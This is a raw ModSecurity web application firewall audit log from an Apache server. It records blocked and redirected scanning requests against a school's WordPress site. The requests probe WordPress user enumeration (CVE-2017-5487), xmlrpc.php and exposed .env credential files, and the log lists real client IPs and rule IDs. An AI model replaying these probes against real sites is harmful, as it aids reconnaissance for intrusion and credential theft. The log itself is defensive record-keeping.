Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400f2040-Z-- --f915a52f-A-- [10/May/2025:19:32:14 +0700] aB9HTtr9PbfRBMhzxmSkGQAAAFc 103.236.140.4 39762 103.236.140.4 8181 --f915a52f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.92.189.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.92.189.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f915a52f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f915a52f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746880334759713 2610 (- - -) Stopwatch2: 1746880334759713 2610; combined=1190, p1=418, p2=742, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f915a52f-Z-- --bf45116d-A-- [10/May/2025:19:47:37 +0700] aB9K6ci6w7GTj2w44Z7qJAAAAMc 103.236.140.4 49876 103.236.140.4 8181 --bf45116d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf45116d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf45116d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746881257747607 3146 (- - -) Stopwatch2: 1746881257747607 3146; combined=1402, p1=472, p2=898, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf45116d-Z-- --7998e678-A-- [10/May/2025:19:47:43 +0700] aB9K79r9PbfRBMhzxmSmFwAAAEg 103.236.140.4 49968 103.236.140.4 8181 --7998e678-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.138 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7998e678-C-- demo.sayHello --7998e678-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7998e678-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746881263452591 5557 (- - -) Stopwatch2: 1746881263452591 5557; combined=4244, p1=540, p2=3475, p3=35, p4=36, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7998e678-Z-- --ebb86a57-A-- [10/May/2025:19:59:47 +0700] aB9Nw8i6w7GTj2w44Z7vOAAAAM0 103.236.140.4 36046 103.236.140.4 8181 --ebb86a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebb86a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebb86a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746881987320647 2416 (- - -) Stopwatch2: 1746881987320647 2416; combined=1391, p1=424, p2=937, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebb86a57-Z-- --99b94561-A-- [10/May/2025:19:59:52 +0700] aB9NyKuC4AqLGUOyzyVA9QAAAJU 103.236.140.4 36150 103.236.140.4 8181 --99b94561-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99b94561-C-- demo.sayHello --99b94561-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b94561-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746881992403221 5223 (- - -) Stopwatch2: 1746881992403221 5223; combined=3754, p1=513, p2=3044, p3=32, p4=33, p5=79, sr=61, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b94561-Z-- --6568ff6e-A-- [10/May/2025:20:01:38 +0700] aB9OMquC4AqLGUOyzyVBKAAAAI8 103.236.140.4 38124 103.236.140.4 8181 --6568ff6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.109.19.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.109.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6568ff6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6568ff6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746882098713224 2565 (- - -) Stopwatch2: 1746882098713224 2565; combined=1176, p1=366, p2=783, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6568ff6e-Z-- --1fdc5b73-A-- [10/May/2025:20:21:53 +0700] aB9S8auC4AqLGUOyzyVEowAAAJE 103.236.140.4 58640 103.236.140.4 8181 --1fdc5b73-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.184.206.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.184.206.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1fdc5b73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fdc5b73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746883313120582 3126 (- - -) Stopwatch2: 1746883313120582 3126; combined=1381, p1=436, p2=912, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fdc5b73-Z-- --f74c877c-A-- [10/May/2025:20:25:59 +0700] aB9T58i6w7GTj2w44Z720wAAANQ 103.236.140.4 34188 103.236.140.4 8181 --f74c877c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.247.162.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.247.162.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f74c877c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f74c877c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746883559588471 2817 (- - -) Stopwatch2: 1746883559588471 2817; combined=1273, p1=424, p2=820, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f74c877c-Z-- --f6745c0c-A-- [10/May/2025:20:46:03 +0700] aB9YmxLuBiaF9R054QDEMAAAAAA 103.236.140.4 52146 103.236.140.4 8181 --f6745c0c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f6745c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6745c0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746884763896874 777 (- - -) Stopwatch2: 1746884763896874 777; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6745c0c-Z-- --6dc81d48-A-- [10/May/2025:21:23:31 +0700] aB9hY9r9PbfRBMhzxmTJ-AAAAEw 103.236.140.4 34996 103.236.140.4 8181 --6dc81d48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6dc81d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dc81d48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887011167539 2544 (- - -) Stopwatch2: 1746887011167539 2544; combined=1116, p1=383, p2=706, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dc81d48-Z-- --9d34c60d-A-- [10/May/2025:21:23:38 +0700] aB9hatr9PbfRBMhzxmTKDQAAAFE 103.236.140.4 35292 103.236.140.4 8181 --9d34c60d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d34c60d-C-- demo.sayHello --9d34c60d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d34c60d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746887018959700 5179 (- - -) Stopwatch2: 1746887018959700 5179; combined=3754, p1=505, p2=3064, p3=27, p4=30, p5=76, sr=62, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d34c60d-Z-- --170e9b74-A-- [10/May/2025:21:26:56 +0700] aB9iMKuC4AqLGUOyzyVkngAAAII 103.236.140.4 43078 103.236.140.4 8181 --170e9b74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --170e9b74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --170e9b74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887216903749 2627 (- - -) Stopwatch2: 1746887216903749 2627; combined=1119, p1=346, p2=738, p3=0, p4=0, p5=34, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --170e9b74-Z-- --427e8379-A-- [10/May/2025:21:27:04 +0700] aB9iOMi6w7GTj2w44Z4ZGQAAAME 103.236.140.4 43362 103.236.140.4 8181 --427e8379-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --427e8379-C-- demo.sayHello --427e8379-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --427e8379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746887224541097 4504 (- - -) Stopwatch2: 1746887224541097 4504; combined=3174, p1=427, p2=2562, p3=28, p4=27, p5=75, sr=54, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --427e8379-Z-- --04f0c013-A-- [10/May/2025:21:28:07 +0700] aB9idxLuBiaF9R054QDf5AAAAAs 103.236.140.4 45700 103.236.140.4 8181 --04f0c013-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.35.108.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.35.108.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04f0c013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f0c013-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887287667717 2233 (- - -) Stopwatch2: 1746887287667717 2233; combined=943, p1=318, p2=604, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f0c013-Z-- --3aec2759-A-- [10/May/2025:21:31:11 +0700] aB9jL8i6w7GTj2w44Z4cXgAAANQ 103.236.140.4 52600 103.236.140.4 8181 --3aec2759-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.163.113.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.163.113.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3aec2759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aec2759-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887471840896 2508 (- - -) Stopwatch2: 1746887471840896 2508; combined=1148, p1=429, p2=692, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aec2759-Z-- --cbdf9261-A-- [10/May/2025:21:52:35 +0700] aB9oM8i6w7GTj2w44Z4vxAAAAMo 103.236.140.4 45690 103.236.140.4 8181 --cbdf9261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0 Accept-Charset: utf-8 --cbdf9261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdf9261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746888755614841 752 (- - -) Stopwatch2: 1746888755614841 752; combined=284, p1=246, p2=0, p3=0, p4=0, p5=38, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdf9261-Z-- --4a93c252-A-- [10/May/2025:22:15:58 +0700] aB9trsi6w7GTj2w44Z5FVQAAAMs 103.236.140.4 45178 103.236.140.4 8181 --4a93c252-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.182.227.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.182.227.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4a93c252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a93c252-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746890158253695 6864 (- - -) Stopwatch2: 1746890158253695 6864; combined=5141, p1=1289, p2=3808, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
